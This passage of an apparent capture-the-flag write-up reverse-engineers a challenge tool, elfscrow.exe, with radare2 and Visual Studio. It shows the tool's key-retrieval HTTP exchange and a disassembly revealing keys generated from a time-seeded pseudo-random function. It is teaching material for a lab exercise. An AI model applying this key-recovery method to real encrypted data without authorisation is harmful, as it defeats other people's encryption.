&lt;span class="go"&gt;Retrieving the key from: /api/retrieve&lt;/span&gt;

&lt;span class="go"&gt;We found your key!&lt;/span&gt;
&lt;span class="go"&gt;File successfully decrypted!&lt;/span&gt;

&lt;span class="go"&gt;  +----------------------+&lt;/span&gt;
&lt;span class="go"&gt;  |\                    /\&lt;/span&gt;
&lt;span class="go"&gt;  | \ ________________ / |\&lt;/span&gt;
&lt;span class="go"&gt;  |  |                |  | \&lt;/span&gt;
&lt;span class="go"&gt;  |  | +------------+ |  |  \&lt;/span&gt;
&lt;span class="go"&gt;  |  | |\          /| |  |   \&lt;/span&gt;
&lt;span class="go"&gt;  |  | | \        / | |  |    \&lt;/span&gt;
&lt;span class="go"&gt;  |  | |  \      /  | |  |     \&lt;/span&gt;
&lt;span class="go"&gt;  |  | |   \    /   | |  |     |&lt;/span&gt;
&lt;span class="go"&gt;  |  | |    \  /    | |  |     |&lt;/span&gt;
&lt;span class="go"&gt;  |  | |     \/     | |  |     |&lt;/span&gt;
&lt;span class="go"&gt;  |  | |            | |  |     |&lt;/span&gt;
&lt;span class="go"&gt;  |  | |            | |  |     |&lt;/span&gt;
&lt;span class="go"&gt;  |  |_|   SECRET   |_|  |     |&lt;/span&gt;
&lt;span class="go"&gt;  | /  +------------+  \ |     |&lt;/span&gt;
&lt;span class="go"&gt;  |/                    \|     |&lt;/span&gt;
&lt;span class="go"&gt;  +----------------------\     |&lt;/span&gt;
&lt;span class="go"&gt;                          \    |&lt;/span&gt;
&lt;span class="go"&gt;                           \   |&lt;/span&gt;
&lt;span class="go"&gt;                            \  |&lt;/span&gt;
&lt;span class="go"&gt;                             \ |&lt;/span&gt;
&lt;span class="go"&gt;                              \|&lt;/span&gt;
&lt;span class="go"&gt;                               |&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/api/retrieve&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Elfscrow 1.0 (SantaBrowse Compatible)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;elfscrow.elfu.org&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;36&lt;/span&gt;
&lt;span class="na"&gt;Cache-Control&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;no-cache&lt;/span&gt;

ed662e52-a681-42c8-acf9-bee4caa4f5a8
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Sun, 12 Jan 2020 12:37:04 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html;charset=utf-8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;16&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;keep-alive&lt;/span&gt;
&lt;span class="na"&gt;X-Xss-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Content-Type-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nosniff&lt;/span&gt;
&lt;span class="na"&gt;X-Frame-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SAMEORIGIN&lt;/span&gt;

a0ad8f3edde93d45
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To decrypt our file, the &lt;code&gt;elfscrow.exe&lt;/code&gt; tool sends our secret id to the
elfscrow.elfu.org server, which sends back our encryption key.&lt;/p&gt;
&lt;p&gt;So, how can we decrypt our PDF file? If we manage to recover the secret id, we
can ask the elfscrow.elfu.org server to send the key back. However, the secret
id seems to be fully managed by the web server, and we don't have any
information on it.&lt;/p&gt;
&lt;p&gt;The other way would be to look at how our encryption key is generated by the
executable. This is where having the executable and the debuging symbols is
useful. Now, I first tried analyzing it using &lt;code&gt;radare2&lt;/code&gt;, however the
disassembling seemed weirdly incomplete. I then tried using Ghydra on Linux,
but loading PDB files is not supported on Linux. So, I then tried using Ghydra
on Windows, but I got an error trying to load the PDB file. Uuuuugh. Finally,
I fell back on Visual Studio, with a little bit on &lt;code&gt;radare2&lt;/code&gt; on the side.&lt;/p&gt;
&lt;p&gt;I followed the following Microsoft documentation to debug an executable:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference external" href="https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-debug-an-executable-not-part-of-a-visual-studio-solution?view=vs-2019"&gt;Debug an app that isn't part of a Visual Studio solution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="https://docs.microsoft.com/en-us/visualstudio/debugger/specify-symbol-dot-pdb-and-source-files-in-the-visual-studio-debugger?view=vs-2019#configure-symbol-locations-and-loading-options"&gt;Specify symbol (.pdb) and source files in the Visual Studio debugger&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let's see the list of functions in &lt;code&gt;radare2&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; r2 ./elfscrow.exe
&lt;span class="go"&gt;[0x004037f7]&amp;gt; idp ./elfscrow.pdb&lt;/span&gt;

&lt;span class="go"&gt;[0x004037f7]&amp;gt; aaa&lt;/span&gt;
&lt;span class="go"&gt;[x] Analyze all flags starting with sym. and entry0 (aa)&lt;/span&gt;
&lt;span class="go"&gt;[x] Analyze len bytes of instructions for references (aar)&lt;/span&gt;
&lt;span class="go"&gt;[x] Analyze function calls (aac)&lt;/span&gt;
&lt;span class="go"&gt;[x] Use -AA or aaaa to perform additional experimental analysis.&lt;/span&gt;
&lt;span class="go"&gt;[x] Constructing a function name for fcn.* and sym.func.* functions (aan)&lt;/span&gt;
&lt;span class="go"&gt;[0x004037f7]&amp;gt; afl&lt;/span&gt;
&lt;span class="go"&gt;0x00401000  104 1903 -&amp;gt; 1872 pdb.int___cdecl__getopt_internal_int__char_____const__char_const____struct_option_const____int____int&lt;/span&gt;
&lt;span class="go"&gt;0x00401770   64 1297 -&amp;gt; 1260 sub.s:_illegal_option_____c_770&lt;/span&gt;
&lt;span class="go"&gt;0x00401c90    1 35           pdb.int___cdecl_getopt_long_only_int__char_____const__char_const____struct_option_const____int&lt;/span&gt;
&lt;span class="go"&gt;0x00401cc0    4 203          pdb.void___cdecl_fatal_error_char&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;0x00401d90    1 42           pdb.void___cdecl_super_secure_srand_int&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;0x00401dc0    1 39           pdb.int___cdecl_super_secure_random_void&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;0x00401df0    5 99           pdb.void___cdecl_generate_key_unsigned_char___const&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;0x00401e60    1 18           fcn.00401e60&lt;/span&gt;
&lt;span class="go"&gt;0x00401e80    5 68           pdb.void___cdecl_to_hex_unsigned_char___const__char___const&lt;/span&gt;
&lt;span class="go"&gt;0x00401ed0    5 79           pdb.void___cdecl_from_hex_char___const__unsigned_char___const&lt;/span&gt;
&lt;span class="go"&gt;0x00401f20   25 758          pdb.void___cdecl_store_key_int__unsigned_char___const&lt;/span&gt;
&lt;span class="go"&gt;0x00402220    1 18           pdb.void___cdecl_retrieve_key_int__unsigned_char___const__char&lt;/span&gt;
&lt;span class="go"&gt;0x00402540    5 126          pdb.void___cdecl_print_hex_char____unsigned_char____unsigned_int&lt;/span&gt;
&lt;span class="go"&gt;0x004025c0    8 154          pdb.unsigned_char_____cdecl_read_file_char____unsigned_long_int&lt;/span&gt;
&lt;span class="go"&gt;0x00402660    6 103          pdb.void___cdecl_write_file_char____unsigned_char____unsigned_int&lt;/span&gt;
&lt;span class="go"&gt;0x004026d0    1 15           pdb.void___cdecl_do_encrypt_int__char____char&lt;/span&gt;
&lt;span class="go"&gt;0x00402a00    1 15           pdb.void___cdecl_do_decrypt_int__char____char____char&lt;/span&gt;
&lt;span class="go"&gt;0x00402d80    1 45           pdb.void___cdecl_usage_char&lt;/span&gt;
&lt;span class="go"&gt;0x00402db0   86 1942 -&amp;gt; 1943 pdb._main&lt;/span&gt;
&lt;span class="go"&gt;0x00403546    3 15   -&amp;gt; 122  pdb.___security_check_cookie_4&lt;/span&gt;
&lt;span class="go"&gt;0x004037f7   14 10   -&amp;gt; 202  entry0&lt;/span&gt;
&lt;span class="go"&gt;0x00403801    1 107          pdb.___report_gsfailure&lt;/span&gt;
&lt;span class="go"&gt;0x00403958    1 6            pdb.__amsg_exit&lt;/span&gt;
&lt;span class="go"&gt;0x0040395e    3 139  -&amp;gt; 145  pdb.__onexit&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;These three functions, &lt;code&gt;super_secure_srand&lt;/code&gt;, &lt;code&gt;super_secure_random&lt;/code&gt;,
and &lt;code&gt;generate_key&lt;/code&gt;, seem clearly interesting.&lt;/p&gt;
&lt;p&gt;Let's look at &lt;code&gt;generate_key&lt;/code&gt;:&lt;/p&gt;
&lt;table class="highlighttable"&gt;&lt;tr&gt;&lt;td class="linenos"&gt;&lt;div class="linenodiv"&gt;&lt;pre&gt; 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32&lt;/pre&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DF0:&lt;/span&gt; &lt;span class="err"&gt;55&lt;/span&gt;                   &lt;span class="nf"&gt;push&lt;/span&gt;        &lt;span class="nb"&gt;ebp&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DF1:&lt;/span&gt; &lt;span class="err"&gt;8&lt;/span&gt;&lt;span class="nf"&gt;B&lt;/span&gt; &lt;span class="nv"&gt;EC&lt;/span&gt;                &lt;span class="nv"&gt;mov&lt;/span&gt;         &lt;span class="nb"&gt;ebp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nb"&gt;esp&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DF3:&lt;/span&gt; &lt;span class="err"&gt;51&lt;/span&gt;                   &lt;span class="nf"&gt;push&lt;/span&gt;        &lt;span class="nb"&gt;ecx&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DF4:&lt;/span&gt; &lt;span class="err"&gt;68&lt;/span&gt; &lt;span class="err"&gt;10&lt;/span&gt; &lt;span class="err"&gt;43&lt;/span&gt; &lt;span class="err"&gt;63&lt;/span&gt; &lt;span class="err"&gt;00&lt;/span&gt;       &lt;span class="nf"&gt;push&lt;/span&gt;        &lt;span class="mh"&gt;634310h&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DF9:&lt;/span&gt; &lt;span class="nf"&gt;FF&lt;/span&gt; &lt;span class="mi"&gt;15&lt;/span&gt; &lt;span class="nv"&gt;CC&lt;/span&gt; &lt;span class="mi"&gt;40&lt;/span&gt; &lt;span class="mi"&gt;63&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt;    &lt;span class="nv"&gt;call&lt;/span&gt;        &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="nv"&gt;ptr&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;__imp____iob_func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;06340CCh&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DFF:&lt;/span&gt; &lt;span class="err"&gt;83&lt;/span&gt; &lt;span class="nf"&gt;C0&lt;/span&gt; &lt;span class="mi"&gt;40&lt;/span&gt;             &lt;span class="nv"&gt;add&lt;/span&gt;         &lt;span class="nb"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mh"&gt;40h&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E02:&lt;/span&gt; &lt;span class="err"&gt;50&lt;/span&gt;                   &lt;span class="nf"&gt;push&lt;/span&gt;        &lt;span class="nb"&gt;eax&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E03:&lt;/span&gt; &lt;span class="nf"&gt;FF&lt;/span&gt; &lt;span class="mi"&gt;15&lt;/span&gt; &lt;span class="nv"&gt;C8&lt;/span&gt; &lt;span class="mi"&gt;40&lt;/span&gt; &lt;span class="mi"&gt;63&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt;    &lt;span class="nv"&gt;call&lt;/span&gt;        &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="nv"&gt;ptr&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;__imp__fprintf&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;06340C8h&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E09:&lt;/span&gt; &lt;span class="err"&gt;83&lt;/span&gt; &lt;span class="nf"&gt;C4&lt;/span&gt; &lt;span class="mi"&gt;08&lt;/span&gt;             &lt;span class="nv"&gt;add&lt;/span&gt;         &lt;span class="nb"&gt;esp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;8&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E0C:&lt;/span&gt; &lt;span class="err"&gt;6&lt;/span&gt;&lt;span class="nf"&gt;A&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt;                &lt;span class="nv"&gt;push&lt;/span&gt;        &lt;span class="mi"&gt;0&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E0E:&lt;/span&gt; &lt;span class="nf"&gt;E8&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="nv"&gt;D&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt;       &lt;span class="nv"&gt;call&lt;/span&gt;        &lt;span class="nv"&gt;time&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0631E60h&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E13:&lt;/span&gt; &lt;span class="err"&gt;83&lt;/span&gt; &lt;span class="nf"&gt;C4&lt;/span&gt; &lt;span class="mi"&gt;04&lt;/span&gt;             &lt;span class="nv"&gt;add&lt;/span&gt;         &lt;span class="nb"&gt;esp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E16:&lt;/span&gt; &lt;span class="err"&gt;50&lt;/span&gt;                   &lt;span class="nf"&gt;push&lt;/span&gt;        &lt;span class="nb"&gt;eax&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E17:&lt;/span&gt; &lt;span class="nf"&gt;E8&lt;/span&gt; &lt;span class="mi"&gt;74&lt;/span&gt; &lt;span class="nv"&gt;FF&lt;/span&gt; &lt;span class="nv"&gt;FF&lt;/span&gt; &lt;span class="nv"&gt;FF&lt;/span&gt;       &lt;span class="nv"&gt;call&lt;/span&gt;        &lt;span class="nv"&gt;super_secure_srand&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0631D90h&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E1C:&lt;/span&gt; &lt;span class="err"&gt;83&lt;/span&gt; &lt;span class="nf"&gt;C4&lt;/span&gt; &lt;span class="mi"&gt;04&lt;/span&gt;             &lt;span class="nv"&gt;add&lt;/span&gt;         &lt;span class="nb"&gt;esp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E1F:&lt;/span&gt; &lt;span class="nf"&gt;C7&lt;/span&gt; &lt;span class="mi"&gt;45&lt;/span&gt; &lt;span class="nv"&gt;FC&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt; &lt;span class="nv"&gt;mov&lt;/span&gt;         &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="nv"&gt;ptr&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;i&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E26:&lt;/span&gt; &lt;span class="nf"&gt;EB&lt;/span&gt; &lt;span class="mi"&gt;09&lt;/span&gt;                &lt;span class="nv"&gt;jmp&lt;/span&gt;         &lt;span class="nv"&gt;generate_key&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mh"&gt;41h&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0631E31h&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E28:&lt;/span&gt; &lt;span class="err"&gt;8&lt;/span&gt;&lt;span class="nf"&gt;B&lt;/span&gt; &lt;span class="mi"&gt;45&lt;/span&gt; &lt;span class="nv"&gt;FC&lt;/span&gt;             &lt;span class="nv"&gt;mov&lt;/span&gt;         &lt;span class="nb"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="nv"&gt;ptr&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E2B:&lt;/span&gt; &lt;span class="err"&gt;83&lt;/span&gt; &lt;span class="nf"&gt;C0&lt;/span&gt; &lt;span class="mi"&gt;01&lt;/span&gt;             &lt;span class="nv"&gt;add&lt;/span&gt;         &lt;span class="nb"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E2E:&lt;/span&gt; &lt;span class="err"&gt;89&lt;/span&gt; &lt;span class="err"&gt;45&lt;/span&gt; &lt;span class="nf"&gt;FC&lt;/span&gt;             &lt;span class="nv"&gt;mov&lt;/span&gt;         &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="nv"&gt;ptr&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;i&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="nb"&gt;eax&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E31:&lt;/span&gt; &lt;span class="err"&gt;83&lt;/span&gt; &lt;span class="err"&gt;7&lt;/span&gt;&lt;span class="nf"&gt;D&lt;/span&gt; &lt;span class="nv"&gt;FC&lt;/span&gt; &lt;span class="mi"&gt;08&lt;/span&gt;          &lt;span class="nv"&gt;cmp&lt;/span&gt;         &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="nv"&gt;ptr&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;i&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="mi"&gt;8&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E35:&lt;/span&gt; &lt;span class="err"&gt;73&lt;/span&gt; &lt;span class="err"&gt;18&lt;/span&gt;                &lt;span class="nf"&gt;jae&lt;/span&gt;         &lt;span class="nv"&gt;generate_key&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mh"&gt;5Fh&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0631E4Fh&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E37:&lt;/span&gt; &lt;span class="nf"&gt;E8&lt;/span&gt; &lt;span class="mi"&gt;84&lt;/span&gt; &lt;span class="nv"&gt;FF&lt;/span&gt; &lt;span class="nv"&gt;FF&lt;/span&gt; &lt;span class="nv"&gt;FF&lt;/span&gt;       &lt;span class="nv"&gt;call&lt;/span&gt;        &lt;span class="nv"&gt;super_secure_random&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0631DC0h&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E3C:&lt;/span&gt; &lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;F&lt;/span&gt; &lt;span class="nv"&gt;B6&lt;/span&gt; &lt;span class="nv"&gt;C8&lt;/span&gt;             &lt;span class="nv"&gt;movzx&lt;/span&gt;       &lt;span class="nb"&gt;ecx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nb"&gt;al&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E3F:&lt;/span&gt; &lt;span class="err"&gt;81&lt;/span&gt; &lt;span class="nf"&gt;E1&lt;/span&gt; &lt;span class="nv"&gt;FF&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt;    &lt;span class="nv"&gt;and&lt;/span&gt;         &lt;span class="nb"&gt;ecx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mh"&gt;0FFh&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E45:&lt;/span&gt; &lt;span class="err"&gt;8&lt;/span&gt;&lt;span class="nf"&gt;B&lt;/span&gt; &lt;span class="mi"&gt;55&lt;/span&gt; &lt;span class="mi"&gt;08&lt;/span&gt;             &lt;span class="nv"&gt;mov&lt;/span&gt;         &lt;span class="nb"&gt;edx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="nv"&gt;ptr&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;buffer&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E48:&lt;/span&gt; &lt;span class="err"&gt;03&lt;/span&gt; &lt;span class="err"&gt;55&lt;/span&gt; &lt;span class="nf"&gt;FC&lt;/span&gt;             &lt;span class="nv"&gt;add&lt;/span&gt;         &lt;span class="nb"&gt;edx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="nv"&gt;ptr&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E4B:&lt;/span&gt; &lt;span class="err"&gt;88&lt;/span&gt; &lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;A&lt;/span&gt;                &lt;span class="nv"&gt;mov&lt;/span&gt;         &lt;span class="kt"&gt;byte&lt;/span&gt; &lt;span class="nv"&gt;ptr&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;edx&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="nb"&gt;cl&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E4D:&lt;/span&gt; &lt;span class="nf"&gt;EB&lt;/span&gt; &lt;span class="nv"&gt;D9&lt;/span&gt;                &lt;span class="nv"&gt;jmp&lt;/span&gt;         &lt;span class="nv"&gt;generate_key&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mh"&gt;38h&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0631E28h&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E4F:&lt;/span&gt; &lt;span class="err"&gt;8&lt;/span&gt;&lt;span class="nf"&gt;B&lt;/span&gt; &lt;span class="nv"&gt;E5&lt;/span&gt;                &lt;span class="nv"&gt;mov&lt;/span&gt;         &lt;span class="nb"&gt;esp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nb"&gt;ebp&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E51:&lt;/span&gt; &lt;span class="err"&gt;5&lt;/span&gt;&lt;span class="nf"&gt;D&lt;/span&gt;                   &lt;span class="nv"&gt;pop&lt;/span&gt;         &lt;span class="nb"&gt;ebp&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;E52:&lt;/span&gt; &lt;span class="nf"&gt;C3&lt;/span&gt;                   &lt;span class="nv"&gt;ret&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;Interesting! It seems that the function calls &lt;code&gt;time&lt;/code&gt;, surely to
initialize the seed, as suspected. Then, the function &lt;code&gt;super_secure_srand&lt;/code&gt;
is called. Finally, there seems to be a loop, where the function
&lt;code&gt;super_secure_random&lt;/code&gt; is called (line 23), until &lt;code&gt;eax&lt;/code&gt; is equal to
8 (lines 20, 21, 22). If you remember the execution of the program, the
generated key has a length of 8 bytes. So, the function
&lt;code&gt;super_secure_random&lt;/code&gt; must be used to generate the bytes of the key, one
by one.&lt;/p&gt;
&lt;p&gt;Let's first take a look at the &lt;code&gt;super_secure_srand&lt;/code&gt; function:&lt;/p&gt;
